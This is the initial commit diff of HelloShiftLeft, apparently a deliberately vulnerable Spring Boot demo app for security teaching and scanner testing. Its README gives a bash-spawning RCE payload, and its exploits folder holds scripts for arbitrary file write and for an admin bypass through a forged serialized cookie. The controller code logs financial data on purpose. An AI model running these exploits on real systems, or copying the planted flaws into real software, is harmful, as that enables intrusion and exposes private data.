Initial commit

Author: tuxology

LICENSE

@@ -0,0 +1,21 @@
+MIT License
+
+Copyright (c) 2017 ShiftLeft Inc.
+
+Permission is hereby granted, free of charge, to any person obtaining a copy
+of this software and associated documentation files (the "Software"), to deal
+in the Software without restriction, including without limitation the rights
+to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
+copies of the Software, and to permit persons to whom the Software is
+furnished to do so, subject to the following conditions:
+
+The above copyright notice and this permission notice shall be included in all
+copies or substantial portions of the Software.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
+SOFTWARE.

README.md

@@ -0,0 +1,73 @@
+# HelloShiftLeft
+
+This is a demo application which provides a real world representation of a REST service that uses a mix of convention and configuration to simulate a decent set of vulnerabilities exposed in the code. It includes scenarios such as sensitive data leaking to logs, data secrets leaks, authentication bypass, remote code execution, XSS vulnerabilites etc. The sample sensitive data is a mix of financial data such as account information, medical data of patients, and other PII data such as customer information. HelloShiftLeft also contains patterns/anti-patterns of how data is used/abused in interfaces or channels (to and from HTTP/TCP, third-party, database) that can lead to vulnerabilites. The application is built on the Spring Framework and exposes a series of endpoints and APIs for queries and simulating exploits.
+
+## Build
+ ```sh
+ $ git clone https://github.com/ShiftLeftSecurity/HelloShiftLeft.git
+ $ cd HelloShiftLeft
+ $ mvn clean package
+ ```
+ 
+## Run
+ ```sh
+ $ java -jar target/hello-shiftleft-0.0.1.jar --jasypt.encryptor.password=shiftbyte5
+```
+
+## Exercise Vulnerabilites and Exposures
+Once the application starts, vulnerabilites and exposures in it can be tested with API access patterns described below and through example scripts provided in the [exploits](https://github.com/ShiftLeftSecurity/HelloShiftLeft/tree/master/exploits) directory. These are summarized below:  
+
+### Sensitive Data Leaks to Log
+
+| URL |  Purpose |
+| --- | ------- |
+| `http://localhost:8081/customers/1` | Returns JSON representation of Customer resource based on Id (1) specified in URL |
+| `http://localhost:8081/customers` | Returns JSON representation of all available Customer resources |
+| `http://localhost:8081/patients`  | Returns JSON representation of all available patients in record |
+| `http://localhost:8081/account/1`  | Returns JSON representation of Account based on Id (1) specified |
+| `http://localhost:8081/account`  | Returns JSON representation of all available accounts and their details |
+
+All the above requests leak sensitive medical and PII data to the logging service. In addition other endpoints such as `/saveSettings`, `/search/user`, `/admin/login` etc. are also available. Along with the list above, users can explore variations of `GET`, `POST` and `PUT` requests sent to these endpoints.
+
+### Remote Code Execution
+
+An RCE can be triggered through the `/search/user` endpoint by sending a `POST` request as follows:
+```
+POST /search/user HTTP/1.1
+Host: localhost:8081
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:55.0) Gecko/20100101 Firefox/55.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Upgrade-Insecure-Requests: 1
+Content-Length: 86
+Pragma: no-cache
+Cache-Control: no-cache
+DNT: 1
+Connection: close
+
+new java.lang.ProcessBuilder({'/bin/bash','-c','echo "3vilhax0r">/tmp/hacked'}).start()
+```
+This creates a file `/tmp/hacked` with the content `3vilhax0r`
+
+### Arbritary File Write
+
+The [filewriteexploit.py](https://github.com/ShiftLeftSecurity/HelloShiftLeft/blob/master/exploits/filewriteexploit.py) script can be executed as follows to trigger the arbritary file writing through the `/saveSettings` endpoint:
+```
+$ python2 filewriteexploit.py http://localhost:8081/saveSettings testfile 3vilhax0r
+```
+This creates a file named `testfile` with `3vilhax0r` as its contents
+
+### Authentication Bypass
+
+The [exploit.py](https://github.com/ShiftLeftSecurity/helloshiftleft/blob/master/exploits/JavaSerializationExploit/src/main/java/exploit.py) script allows an authentication bypass by exposing a deserialization vulnerability which allows administrator access:
+```
+$ python2 exploit.py
+```
+
+This returns the following sensitive data:
+
+```
+Customer;Month;Volume
+Netflix;January;200,000
+Palo Alto;January;200,000
+```

exploits/JavaSerializationExploit/src/main/java/DoSerialize.java

@@ -0,0 +1,19 @@
+import io.shiftleft.model.AuthToken;
+import java.io.*;
+import java.util.Base64;
+import java.net.*;
+public class DoSerialize {
+
+  public static void main(String[] main) throws Exception{
+    AuthToken authToken = new AuthToken(0);
+    ByteArrayOutputStream bos = new ByteArrayOutputStream();
+    ObjectOutputStream out = new ObjectOutputStream(bos);
+    out.writeObject(authToken);
+    String finalToken = new String(Base64.getEncoder().encode(bos.toByteArray()));
+    out.writeObject(authToken);
+    out.close();
+
+    System.out.println(finalToken);
+  }
+}
+

exploits/JavaSerializationExploit/src/main/java/exploit.py

@@ -0,0 +1,14 @@
+import requests
+from subprocess import Popen, PIPE
+
+def console(cmd):
+    p = Popen(cmd, shell=True, stdout=PIPE)
+    out, err = p.communicate()
+    return (p.returncode, out, err)
+
+
+console("javac DoSerialize.java")
+cookieval = console("java DoSerialize")
+cookie = {'auth': cookieval[1].strip()}
+r = requests.post('http://localhost:8080/admin/login', cookies=cookie, data=" ",allow_redirects=True)
+print r.text

exploits/JavaSerializationExploit/src/main/java/io/shiftleft/model/AuthToken.java

@@ -0,0 +1,40 @@
+package io.shiftleft.model;
+
+import java.io.ObjectInputStream;
+import java.io.Serializable;
+
+import java.io.*;
+
+public class AuthToken implements Serializable {
+  private static final long serialVersionUID = 1L;
+
+  // yes there are only 2 roles so
+  // having them in this class should be fine
+  public static int ADMIN = 0;
+  public static int USER = 1;
+
+  private int role;
+
+  public AuthToken(int role) {
+    this.role = role;
+  }
+
+  public boolean isAdmin() {
+    return this.role == ADMIN;
+  }
+
+  public int getRole() {
+    if(this.role == ADMIN) {
+      return ADMIN;
+    } else {
+      return USER;
+    }
+  }
+
+  public void setRole(int role) {
+    this.role = role;
+  }
+  public void readObject(ObjectInputStream stream) throws IOException, ClassNotFoundException {
+    System.out.println("leeeeeeeeee");
+  }
+}

exploits/filewriteexploit.py

@@ -0,0 +1,18 @@
+import base64, md5, sys, urllib 
+import urllib2
+
+if len(sys.argv) != 4:
+    print "python2 exploit.py url (relative)filepath contentline1,contentline2"
+
+url = sys.argv[1]
+filepath =  sys.argv[2]
+content = sys.argv[3]
+
+payload = base64.b64encode(filepath+","+content)
+payloadhex = md5.md5(payload).hexdigest()
+
+print url
+opener = urllib2.build_opener()
+opener.addheaders.append(('Cookie', 'settings='+payload+","+payloadhex))
+f = opener.open(url)
+print f.read()

pom.xml

@@ -0,0 +1,121 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
+    xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
+    <modelVersion>4.0.0</modelVersion>
+    <groupId>io.shiftleft</groupId>
+    <artifactId>hello-shiftleft</artifactId>
+    <version>0.0.1</version>
+    <parent>
+        <groupId>org.springframework.boot</groupId>
+        <artifactId>spring-boot-starter-parent</artifactId>
+        <version>1.5.1.RELEASE</version>
+    </parent>
+    <dependencies>
+        <dependency>
+    		<groupId>commons-io</groupId>
+    		<artifactId>commons-io</artifactId>
+    		<version>2.5</version>
+		</dependency>
+        <dependency>
+    		<groupId>org.apache.httpcomponents</groupId>
+    		<artifactId>httpclient</artifactId>
+    		<version>4.3.4</version>
+		</dependency>
+		<dependency>
+    		<groupId>org.zeroturnaround</groupId>
+    		<artifactId>zt-exec</artifactId>
+    		<version>1.9</version>
+		</dependency>
+        <dependency>
+           <groupId>org.jasypt</groupId>
+           <artifactId>jasypt</artifactId>
+           <version>1.9.2</version>
+        </dependency>
+        <dependency>
+        <groupId>com.github.ulisesbocchio</groupId>
+        	<artifactId>jasypt-spring-boot-starter</artifactId>
+        	<version>1.11</version>
+		</dependency>
+    	<dependency>
+            <groupId>org.springframework.boot</groupId>
+            <artifactId>spring-boot-starter-web</artifactId>
+        </dependency>
+        <dependency>
+            <groupId>org.springframework.boot</groupId>
+            <artifactId>spring-boot-starter-actuator</artifactId>
+        </dependency>
+        <dependency>
+			<groupId>org.projectlombok</groupId>
+			<artifactId>lombok</artifactId>
+			<version>1.16.6</version>
+			<scope>provided</scope>
+		</dependency>
+		<dependency>
+			<groupId>joda-time</groupId>
+			<artifactId>joda-time</artifactId>
+		</dependency>
+		<dependency>
+			<groupId>org.codehaus.jackson</groupId>
+			<artifactId>jackson-mapper-asl</artifactId>
+			<version>${jackson.mapper.version}</version>
+		</dependency>
+	    <dependency>
+            <groupId>org.springframework.boot</groupId>
+            <artifactId>spring-boot-starter-data-jpa</artifactId>
+        </dependency>
+        <dependency>
+		    <groupId>org.hsqldb</groupId>
+		    <artifactId>hsqldb</artifactId>
+		    <scope>runtime</scope>
+		</dependency>
+        <dependency>
+            <groupId>org.springframework.boot</groupId>
+            <artifactId>spring-boot-starter-test</artifactId>
+            <scope>test</scope>
+        </dependency>
+        <dependency>
+        	<groupId>org.springframework.boot</groupId>
+        	<artifactId>spring-boot-starter-data-jpa</artifactId>
+        </dependency>
+        <dependency>
+            <groupId>org.springframework</groupId>
+            <artifactId>spring-web</artifactId>
+        </dependency>
+        <dependency>
+            <groupId>com.fasterxml.jackson.core</groupId>
+            <artifactId>jackson-databind</artifactId>
+        </dependency>
+    </dependencies>
+    <properties>
+        <java.version>1.8</java.version>
+        <jackson.mapper.version>1.5.6</jackson.mapper.version>
+    </properties>
+    <build>
+        <plugins>
+           <plugin>
+        		<groupId>org.apache.maven.plugins</groupId>
+        		<artifactId>maven-compiler-plugin</artifactId>
+        		<version>3.6.1</version>
+        		<configuration>
+          			<source>1.8</source>
+          			<target>1.8</target>
+                </configuration>
+           </plugin>
+            <plugin>
+                <groupId>org.springframework.boot</groupId>
+                <artifactId>spring-boot-maven-plugin</artifactId>
+            </plugin>
+            <plugin>
+                <artifactId>maven-failsafe-plugin</artifactId>
+                <executions>
+                    <execution>
+                        <goals>
+                            <goal>integration-test</goal>
+                            <goal>verify</goal>
+                        </goals>
+                    </execution>
+                </executions>
+            </plugin>
+        </plugins>
+    </build>
+</project>

src/main/java/io/shiftleft/Application.java

@@ -0,0 +1,13 @@
+package io.shiftleft;
+
+import org.springframework.boot.SpringApplication;
+import org.springframework.boot.autoconfigure.SpringBootApplication;
+
+@SpringBootApplication
+public class Application {
+
+	public static void main(String[] args) {
+		SpringApplication.run(Application.class, args);
+	}
+
+}

src/main/java/io/shiftleft/controller/AccountController.java

@@ -0,0 +1,69 @@
+package io.shiftleft.controller;
+
+import io.shiftleft.model.Account;
+import javax.servlet.http.HttpServletRequest;
+import javax.servlet.http.HttpServletResponse;
+
+import io.shiftleft.repository.AccountRepository;
+import lombok.extern.slf4j.Slf4j;
+import org.springframework.beans.factory.annotation.Autowired;
+import org.springframework.web.bind.annotation.*;
+
+
+/**
+ * Admin checks login
+ */
+@Slf4j
+@RestController
+public class AccountController {
+    @Autowired
+    private AccountRepository accountRepository;
+
+    @GetMapping("/account")
+    public Iterable<Account> getAccountList(HttpServletResponse response, HttpServletRequest request) {
+        response.addHeader("test-header-detection", new Account().toString());
+        log.info("Account Data is {}", this.accountRepository.findOne(1l).toString());
+        return this.accountRepository.findAll();
+    }
+
+    @PostMapping("/account")
+    public Account createAccount(Account account) {
+        this.accountRepository.save(account);
+        log.info("Account Data is {}", account.toString());
+        return account;
+    }
+
+    @GetMapping("/account/{accountId}")
+    public Account getAccount(@PathVariable long accountId) {
+        log.info("Account Data is {}", this.accountRepository.findOne(1l).toString());
+        return this.accountRepository.findOne(accountId);
+    }
+
+    @PostMapping("/account/{accountId}/deposit")
+    public Account depositIntoAccount(@RequestParam double amount, @PathVariable long accountId) {
+        Account account = this.accountRepository.findOne(accountId);
+        log.info("Account Data is {}", account.toString());
+        account.deposit(amount);
+        this.accountRepository.save(account);
+        return account;
+    }
+
+    @PostMapping("/account/{accountId}/withdraw")
+    public Account withdrawFromAccount(@RequestParam double amount, @PathVariable long accountId) {
+        Account account = this.accountRepository.findOne(accountId);
+        account.withdraw(amount);
+        this.accountRepository.save(account);
+        log.info("Account Data is {}", account.toString());
+        return account;
+    }
+
+    @PostMapping("/account/{accountId}/addInterest")
+    public Account addInterestToAccount(@RequestParam double amount, @PathVariable long accountId) {
+        Account account = this.accountRepository.findOne(accountId);
+        account.addInterest();
+        this.accountRepository.save(account);
+        log.info("Account Data is {}", account.toString());
+        return account;
+    }
+
+}